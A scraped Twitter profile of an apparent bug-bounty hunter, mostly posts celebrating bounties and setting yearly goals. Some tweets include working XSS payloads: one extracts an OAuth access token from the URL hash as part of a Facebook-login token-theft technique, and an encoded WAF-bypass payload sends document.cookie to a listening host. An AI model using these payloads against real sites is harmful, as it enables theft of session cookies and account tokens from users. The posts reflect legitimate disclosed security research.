Tweetovi

Blokirali ste korisnika/cu @mashoud1122

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @mashoud1122

  1. 28. sij
    Poništi
  2. 27. sij

    There are some endpoints show JSON, but forget to set the header to “Content-type: application/json” and leave it as “Content-type: text/html” , and they show special chars , easy XSS ;)

    Poništi
  3. 22. sij

    Just got my 1st HackerOne swag.

    Poništi
  4. 14. sij

    Payload: <svg onload=alert(document.location.hash.split('access_token=')[1].split("%25%32%36")[0])>

    Prikaži ovu nit
    Poništi
  5. 14. sij

    Using a reflected xss to steal FB Auth tokens If login with facebook is available,use the rxss to show the location hash Put the rxss url in the facebook auth flow [redirect_uri] See the magic view the pic for more mistknly deld the old twt

    Prikaži ovu nit
    Poništi
  6. 4. sij

    First bug of the year for me

    Poništi
  7. proslijedio/la je Tweet
    31. pro 2019.

    We definitely accomplished the goal “Hunt Before 2020” by hacking one of Russia’s Biggest Companies LETS KEEP HACKING THE PLANET

    Poništi
  8. 31. pro 2019.
    Poništi
  9. proslijedio/la je Tweet
    31. pro 2019.

    - 100k across all platform - 10 crits/p1 across all platform -collab more with - be at the top of the yearly rank of 5 programs

    Poništi
  10. proslijedio/la je Tweet
    27. pro 2019.

    1 - Do more colabs with & 2 - Make 100K in 2020 3 - Be more active in 4 - Do some writeups about my finding 5 - Learn some android / IOS stuff

    Poništi
  11. 27. pro 2019.

    the script tag was blocked, and many others So this was put in an event handler, [Base64 decode it to get a clear understanding ]

    Prikaži ovu nit
    Poništi
  12. 27. pro 2019.

    Did my 1st collab with and We got an amazing XSS on WAF Bypass used: document.write(atob('PGltZyBzcmM9aHR0cDovL2xvY2FsaG9zdDo4MDkvcD89') + btoa(document.cookie) + '>')

    Prikaži ovu nit
    Poništi
  13. 23. pro 2019.

    $10K+ for me this month already . Very unexpected, but I worked hard enough for it . This might be it for the year. Thanks for this amazing platform

    Poništi
  14. 16. pro 2019.

    Awarded $2,250 instead . They just added $1,250

    Prikaži ovu nit
    Poništi
  15. 11. pro 2019.

    Finally on the 90 day board

    Poništi
  16. 10. pro 2019.
    Poništi
  17. 10. pro 2019.

    Yay, I was awarded a $2,250 bounty on ! Text injection. I kept sandwiching it with functions, till I got xss. [normal payloads <script>blablabla]

    Poništi
  18. 9. pro 2019.

    Just Passed 1,000 reps on Yay, I was awarded a $3,000 bounty on !

    Poništi
  19. 9. pro 2019.

    Yay, I was awarded a $1,125 bounty on ! Blind Xss triggered. It took a long while to find because it was a custom blind xss script.

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·